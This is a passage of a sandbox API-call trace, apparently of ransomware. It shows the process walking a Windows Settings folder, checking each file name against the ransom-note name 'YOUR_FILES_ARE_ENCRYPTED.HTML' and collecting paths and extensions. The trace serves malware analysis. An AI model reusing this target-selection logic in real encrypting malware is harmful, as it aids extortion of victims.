pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsPicture.settingcontent-ms") returned 176 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsPicture.settingcontent-ms") returned=".settingcontent-ms" [0121.597] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsPicture.settingcontent-ms") returned=".settingcontent-ms" [0121.597] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93f2166, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf93f2166, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAccountsSync.settingcontent-ms", cAlternateFileName="AAB6AF~1.SET")) returned 1 [0121.599] StrStrIW (lpFirst="AAA_SettingsPageAccountsSync.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.599] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsSync.settingcontent-ms") returned 173 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsSync.settingcontent-ms") returned=".settingcontent-ms" [0121.599] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsSync.settingcontent-ms") returned=".settingcontent-ms" [0121.599] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb5d629c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb5d629c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAccountsUsers.settingcontent-ms", cAlternateFileName="AAF973~1.SET")) returned 1 [0121.599] StrStrIW (lpFirst="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.599] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsUsers.settingcontent-ms") returned 174 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsUsers.settingcontent-ms") returned=".settingcontent-ms" [0121.599] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsUsers.settingcontent-ms") returned=".settingcontent-ms" [0121.599] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbc3e966, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbc3e966, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x417, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageActivate.settingcontent-ms", cAlternateFileName="AAFE78~1.SET")) returned 1 [0121.599] StrStrIW (lpFirst="AAA_SettingsPageActivate.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.599] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageActivate.settingcontent-ms") returned 169 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageActivate.settingcontent-ms") returned=".settingcontent-ms" [0121.599] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageActivate.settingcontent-ms") returned=".settingcontent-ms" [0121.599] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe2e789, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbe2e789, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAppsDefaults.settingcontent-ms", cAlternateFileName="AA91CC~1.SET")) returned 1 [0121.599] StrStrIW (lpFirst="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.599] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaults.settingcontent-ms") returned 173 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAppsDefaults.settingcontent-ms") returned=".settingcontent-ms" [0121.599] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAppsDefaults.settingcontent-ms") returned=".settingcontent-ms" [0121.599] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbfd20c1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbfd20c1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", cAlternateFileName="AA86F6~1.SET")) returned 1 [0121.599] StrStrIW (lpFirst="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.599] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms") returned 190 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms") returned=".settingcontent-ms" [0121.599] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.599] PathFindExtensionW (pszPath="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms") returned=".settingcontent-ms" [0121.599] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc25a894, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc25a894, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d1, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", cAlternateFileName="AA13B2~1.SET")) returned 1 [0121.600] StrStrIW (lpFirst="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.600] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms") returned 185 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms") returned=".settingcontent-ms" [0121.600] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms") returned=".settingcontent-ms" [0121.600] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5c7f08, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc5c7f08, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAppsNotifications.settingcontent-ms", cAlternateFileName="AAF9A5~1.SET")) returned 1 [0121.600] StrStrIW (lpFirst="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.600] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsNotifications.settingcontent-ms") returned 178 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageAppsNotifications.settingcontent-ms") returned=".settingcontent-ms" [0121.600] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageAppsNotifications.settingcontent-ms") returned=".settingcontent-ms" [0121.600] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc71f7fa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc71f7fa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageBackground.settingcontent-ms", cAlternateFileName="AA064F~1.SET")) returned 1 [0121.600] StrStrIW (lpFirst="AAA_SettingsPageBackground.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.600] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBackground.settingcontent-ms") returned 171 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageBackground.settingcontent-ms") returned=".settingcontent-ms" [0121.600] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageBackground.settingcontent-ms") returned=".settingcontent-ms" [0121.600] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc95ba08, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc95ba08, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageBatterySaver.settingcontent-ms", cAlternateFileName="AA8E4E~1.SET")) returned 1 [0121.600] StrStrIW (lpFirst="AAA_SettingsPageBatterySaver.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.600] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBatterySaver.settingcontent-ms") returned 173 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageBatterySaver.settingcontent-ms") returned=".settingcontent-ms" [0121.600] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageBatterySaver.settingcontent-ms") returned=".settingcontent-ms" [0121.600] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcbe3e9d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfcbe3e9d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageColors.settingcontent-ms", cAlternateFileName="AAB06B~1.SET")) returned 1 [0121.600] StrStrIW (lpFirst="AAA_SettingsPageColors.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.600] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageColors.settingcontent-ms") returned 167 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageColors.settingcontent-ms") returned=".settingcontent-ms" [0121.600] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageColors.settingcontent-ms") returned=".settingcontent-ms" [0121.600] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd1415ac, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfd1415ac, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageDataSenseOverview.settingcontent-ms", cAlternateFileName="AAF001~1.SET")) returned 1 [0121.600] StrStrIW (lpFirst="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.600] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDataSenseOverview.settingcontent-ms") returned 178 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageDataSenseOverview.settingcontent-ms") returned=".settingcontent-ms" [0121.600] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.600] PathFindExtensionW (pszPath="AAA_SettingsPageDataSenseOverview.settingcontent-ms") returned=".settingcontent-ms" [0121.600] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6b8695, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfd6b8695, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageDevicesPen.settingcontent-ms", cAlternateFileName="AABBC2~1.SET")) returned 1 [0121.600] StrStrIW (lpFirst="AAA_SettingsPageDevicesPen.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.601] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPen.settingcontent-ms") returned 171 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageDevicesPen.settingcontent-ms") returned=".settingcontent-ms" [0121.601] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageDevicesPen.settingcontent-ms") returned=".settingcontent-ms" [0121.601] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd98d42b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfd98d42b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageDevicesPrinters.settingcontent-ms", cAlternateFileName="AAE8DA~1.SET")) returned 1 [0121.601] StrStrIW (lpFirst="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.601] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPrinters.settingcontent-ms") returned 176 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageDevicesPrinters.settingcontent-ms") returned=".settingcontent-ms" [0121.601] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageDevicesPrinters.settingcontent-ms") returned=".settingcontent-ms" [0121.601] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe172fc6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe172fc6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", cAlternateFileName="AAAB49~1.SET")) returned 1 [0121.601] StrStrIW (lpFirst="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.601] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms") returned 189 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms") returned=".settingcontent-ms" [0121.601] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms") returned=".settingcontent-ms" [0121.601] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe683ed2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe683ed2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x467, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", cAlternateFileName="AA2192~1.SET")) returned 1 [0121.601] StrStrIW (lpFirst="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.601] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms") returned 185 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms") returned=".settingcontent-ms" [0121.601] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms") returned=".settingcontent-ms" [0121.601] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfec53c5e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfec53c5e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", cAlternateFileName="AA0CA5~1.SET")) returned 1 [0121.601] StrStrIW (lpFirst="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.601] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms") returned 181 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms") returned=".settingcontent-ms" [0121.601] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms") returned=".settingcontent-ms" [0121.601] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff64fa62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xff64fa62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", cAlternateFileName="AABD4A~1.SET")) returned 1 [0121.601] StrStrIW (lpFirst="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.601] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms") returned 182 [0121.601] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms") returned=".settingcontent-ms" [0121.601] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.602] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms") returned=".settingcontent-ms" [0121.602] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a20be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a20be, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", cAlternateFileName="AA913F~1.SET")) returned 1 [0121.602] StrStrIW (lpFirst="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.602] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms") returned 184 [0121.602] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms") returned=".settingcontent-ms" [0121.602] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.602] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms") returned=".settingcontent-ms" [0121.602] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc30775, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc30775, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", cAlternateFileName="AA05B3~1.SET")) returned 1 [0121.602] StrStrIW (lpFirst="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.602] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms") returned 178 [0121.602] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms") returned=".settingcontent-ms" [0121.602] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.602] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms") 